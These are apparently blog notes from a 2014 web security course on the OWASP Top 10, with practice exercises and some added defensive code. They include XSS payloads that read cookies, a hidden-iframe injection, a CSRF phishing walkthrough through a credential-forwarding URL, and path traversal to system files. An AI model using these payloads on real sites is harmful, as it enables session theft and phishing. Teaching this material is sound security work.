
Tuesday, June 3, 2014

Top 10 Vulnerabilities, Day 4

#4: Insecure Direct Object Reference

Google search: filetype:xls 通訊錄 (Chinese for "address book")

#3: Cross-Site Scripting (XSS)

<script>alert('hello')</script>

Encode these characters before writing user input into HTML:

& -> &amp;

< -> &lt;

> -> &gt;

Exercise

1. Visit the site http://hackyourselffirst.troyhunt.com

2. Register an account

3. Vote for a selected car (User A)

4. Comment with: <script>alert(document.cookie);</script>

5. Visit that voted car's comment page (User B)

Firefox add-ons used:

1. FireBug

2. Tamper Data

3. Wappalyzer

Using Tamper Data to change the comment text before it is POSTed to the website:

1. Click the Vote button; a comment window will pop up

2. Open the Tamper Data add-on

3. Type something in the comment window

4. Click the Start Tamper button in Tamper Data

5. Click the Vote button in the comment window

6. Tamper Data will pop up a window; click the Tamper button

7. Change the comment text and then click Submit

Download and install Fiddler:

Download version: Fiddler2

Find the port Fiddler listens on: Tools -> Connections -> "Fiddler listens on port"

Configure the browser (Firefox, for example) to use that port as its proxy:

Exercise: try to post from Fiddler

0. Open Fiddler and vote normally on the website, so Fiddler captures all the traffic

1. Click the Composer button

2. Find the vote request item

3. Drag and drop that request into the right-hand window

4. Change the Request Body text

5. Click the Execute button to POST to the website

6. Refresh the browser page to see the result

<script>location.replace("http://xxx")</script>

How do I prevent Cross-Site Scripting (XSS)?

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
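An added example (not from the original post) of the output encoding the cheat sheet recommends: the &, <, > rules listed above plus the two quote characters needed in attribute context, applied to the comment payload from the exercise. The renderComment markup is an assumption, not the voting site's actual template.

```javascript
// Added example (not from the original post): output-encode user input before
// it is written into an HTML page, following the &, <, > rules listed above
// plus the quote characters needed when the value lands inside an attribute.

// Encode the five characters that can change meaning inside HTML text or attributes.
function encodeForHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
  })[ch]);
}

// Render a car comment the way a voting page might (hypothetical template),
// with the untrusted author and comment encoded so the browser shows them as
// text instead of parsing them as markup.
function renderComment(author, comment) {
  return `<li class="comment" data-author="${encodeForHtml(author)}">` +
    `${encodeForHtml(comment)}</li>`;
}

// Constructed sample: the payload from the exercise above.
const samplePayload = "<script>alert(document.cookie);</script>";

console.log(renderComment("User A", samplePayload));
```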

 

#2: Hacking Broken Authentication & Session Management

Attacks:

1. Session ID prediction

2. Brute-forcing session IDs

3. Session fixation

4. Hacking cookies

5. Cross-site request forgery

Defenses:

1. Strong passwords

2. Account lockout policy

Session Life Cycle

#1: Injection (Sources of Injection)

1. User Agent

2. Cookie

3. HTTP Header

4. GET/POST Parameter

5. URL Parameter

6. SQL Query

7. XPath Query

8. IFrame

Google search: user agent string

Exercise: change the User Agent with a Firefox add-on

Change the User Agent to iPhone 3.0

Refresh the web page; you will see the mobile view of Yahoo!

Fiddler can also change the User Agent

iFrame Injection Practice

Create an HTML file like the one below:

<html>

<script>

document.write('<iframe src="http://xxxx/" width=100 height=100 style="visibility:hidden"></iframe>');

</script>

</html>

Tuesday, May 27, 2014

Top 10 Vulnerabilities, Day 3

#9: Using Components with Known Vulnerabilities

http://plvrs.trendmicro.com

If there is a number in the Vulnerability column, that means there are known vulnerabilities in that specific 3rd-party component.

Click View to see the following info, including the CVE ID:

CVE: Common Vulnerabilities and Exposures

Search the CVE database on Google.

Example: CVE-2014-1266, a known Apple vulnerability

But hackers will use the Exploit Database

http://www.exploit-db.com/exploits/25719/

Blind SQL Injection

http://www.exploit-db.com/exploits/21546/

#8: Cross-Site Request Forgery (CSRF)

Also known as One-Click Attack or Session Riding

1. The user has successfully authenticated

2. The hacker sends a link to that user

3. The user clicks on that link; the request reaches the website with the user's existing session, without the user authenticating again

Exercise: send a link, for example the one below, to your friend and see if your friend can open it directly.

http://www.kingstone.com.tw/book/book_page.asp?kmcode=2013000091501&lid=book-class-newbook-first&actid=vertical

What can be achieved?

1. Adding movies to his rental queue

2. Adding a movie to the top of his rental queue

3. Changing the name and address on the account

4. Enabling/disabling extra movie information

5. Changing the e-mail address and password on the account

Launch WebGoat on the local machine by double-clicking webgoat_8080

Open Chrome and type in the URL: http://127.0.0.1:8080/WebGoat/attack

Name & Password: guest

Click the Start WebGoat button to launch it

http://127.0.0.1:8080/WebGoat/attack?Screen=52&menu=900&transferFunds=5000

Homework: How do I prevent it?

1. Add a hidden CSRF token to every page (form).

2. Generate a CAPTCHA for the client and require the user to type it in manually.

 

Example 2: steps are as below

1. Observe the HTTP POST on the victim site

2. A PHP page on the phishing site posts the parameters

3. Generate the URL and send it to users

4. Wait for the user to click

Step 1: Observe the HTTP POST on the victim site

https://www.directpass.com/signin

Request URL

Request Payload

Response Message

Step 2: A PHP page on the phishing site posts the parameters

http://whiteacid.org/misc/xss_post_forwarder.php?xss_target=

Step 3: Generate the URL and send it to users

http://whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.directpass.com/api/auth/checkaccount&account=abc@gmail.com&password=1234abcde

Step 4: Wait for the user to click

#7: Missing Function Level Access Control

Example: on mobile, viewing a picture does not require authentication

Exercise: log in to WebGoat and try whether you can view the Admin Functions

Hint: add a parameter to the URL to make the GET request

#6: Sensitive Data Exposure

Identify the web technology of the following sites:

http://Hackyourselffirst.troyhunt.com

http://crackme.cenzic.com

http://demo.testfire.net

Homework: How to prevent it?

1. Use SSL (https)

2.

#5: Security Misconfiguration

There are 4 major areas:

1. Settings

2. Admin page

3. User accounts

4. Demo applications

How to prevent it? At deployment:

1. Environment hardening (patching)

2. Vulnerability management

3. Operational enablement

Google: index of /admin


Homework: what if I want the site to be searchable on Google, but don't want to expose too much?

1. Use the nofollow meta tag to tell search engines not to crawl the links on the page

2. Use the noindex meta tag to tell search engines not to index this page

3. Use the X-Robots-Tag HTTP header

Reference:

https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet

Thursday, May 22, 2014

Day 2

GET

http://demo.testfire.net

The parameter is passed in the URL: ?content=xxxxx

POST

http://hackyourselffirst.troyhunt.com/

Response header from the Login action

Request URL over https

Edit Cookie

1. Install the Chrome add-on EditThisCookie

2. Change the AuthCookie value from my own to another user's cookie

3. Refresh the web page; the system will automatically log us in as the other user from that cookie

Login with Remember Me

Use a Base64 decoder to recover the password from the Remember Me cookie

Cookie

1. A cookie by itself can NOT authenticate the user

2. A cookie is automatically sent to the website with EVERY subsequent request to that website

3. So make sure all site requests use https

4. Cookie attributes

    Expires

    Domain: (No need to specify; only sent to the originating site)

    Path: only sent for this path, for example /Account/

    HttpOnly: whether JavaScript is allowed to read it

    Secure: the cookie is only sent to the website over https

 

alert(document.cookie) prints out the local cookies

Tick HttpOnly on the Email & Password cookies; this means they are only sent with HTTP requests and cannot be read by JavaScript

Now alert(document.cookie) can't see the email & password
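An added example (not from the original post) that checks the cookie attributes listed above the way a reviewer would inspect a login response: it parses Set-Cookie headers, reports missing HttpOnly, Secure, Path and expiry, and builds a header with those attributes set. The sample headers, cookie names and values are constructed.

```javascript
// Added example (not from the original post): parse Set-Cookie headers and flag
// cookies that lack the HttpOnly, Secure, Path or expiry attributes described
// above. Sample headers below are constructed, not captured from a real site.

// Turn one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const attrs = {};
  for (const a of rest) {
    const i = a.indexOf("=");
    const key = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : a.slice(i + 1);
  }
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// Report what is missing for a cookie that carries session or credential data.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.httponly) findings.push("readable by JavaScript (no HttpOnly)");
  if (!c.attrs.secure) findings.push("sent over plain http (no Secure)");
  if (!c.attrs.path || c.attrs.path === "/") findings.push("not scoped to a path such as /Account/");
  if (!c.attrs.expires && !c.attrs["max-age"]) findings.push("no Expires/Max-Age");
  return { name: c.name, findings };
}

// Build a header with the attributes set the way the notes recommend.
function buildSetCookie(name, value, { path = "/Account/", maxAge = 1800 } = {}) {
  return `${name}=${encodeURIComponent(value)}; Path=${path}; Max-Age=${maxAge}; HttpOnly; Secure`;
}

// Constructed samples: a weak header like the Remember Me cookie above
// (base64 of a constructed address), and a hardened session cookie.
const weakHeader = "Email=dXNlckBleGFtcGxlLmNvbQ==; path=/";
const strongHeader = buildSetCookie("AuthCookie", "opaque-session-id");
console.log(auditSetCookie(weakHeader).findings, auditSetCookie(strongHeader).findings);
```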

 

Hacker Tip

If we know the website uses content=<file name>, we can change the path to whatever we want

For example, use ..\..\..\..\..\..\ to reach the root folder, then go down the path to the file we need, such as C:\Windows\system.ini

 

URL Redirect Issue

http://www.hp.com/cgi-bin/leaving_hp.cgi?cc=us&lang=en&exit_text=Click%20here%20to%20take%20a%20customer%20survey_ooxx&area_text=Newsroom&area_link=http"://www.google2.com/&exit_link=http://www.google1.com/&adid=10427473&affpid=4003003

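An added example (not HP's code) of how a "leaving site" page can validate a redirect target such as the exit_link parameter above against an allowlist of hosts before redirecting. The allowlist entries and fallback are constructed assumptions.

```javascript
// Added example (not HP's code): validate a redirect target like the exit_link
// parameter above against an allowlist before redirecting, so the "leaving"
// page cannot bounce users to an arbitrary site. Allowlist is constructed.

const ALLOWED_HOSTS = new Set(["www.hp.com", "survey.example.com"]);

// Return the redirect URL if it is http/https to an allowed host, else the
// fallback. new URL() throws on unparsable input (such as a URL containing a
// stray quote), which is treated as a rejection.
function safeRedirect(exitLink, fallback = "https://www.hp.com/") {
  let url;
  try {
    url = new URL(exitLink);
  } catch {
    return fallback;
  }
  if (url.protocol !== "https:" && url.protocol !== "http:") return fallback;
  // Credentials in the authority ("user@host") are a classic way to disguise
  // the real host; reject them before looking at the hostname at all.
  if (url.username || url.password) return fallback;
  if (!ALLOWED_HOSTS.has(url.hostname)) return fallback;
  return url.href;
}

// Constructed sample targets: one off-site, one allowed, one wrong scheme,
// one with a disguised host, one unparsable.
const samples = [
  "http://www.google1.com/",
  "https://survey.example.com/take?id=7",
  "ftp://www.hp.com/",
  "https://www.hp.com@evil.example/",
  "not a url",
];
for (const s of samples) console.log(s, "->", safeRedirect(s));
```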

 

URL decode/encode

http://yehg.net/encoding

After encoding, the string becomes the following

URL Tamper

1. http://hackyourselffirst.troyhunt.com//Search?searchTerm=');alert(document.cookie);//

2. http://hackyourselffirst.troyhunt.com//Search?searchTerm=%27);alert(document.cookie);//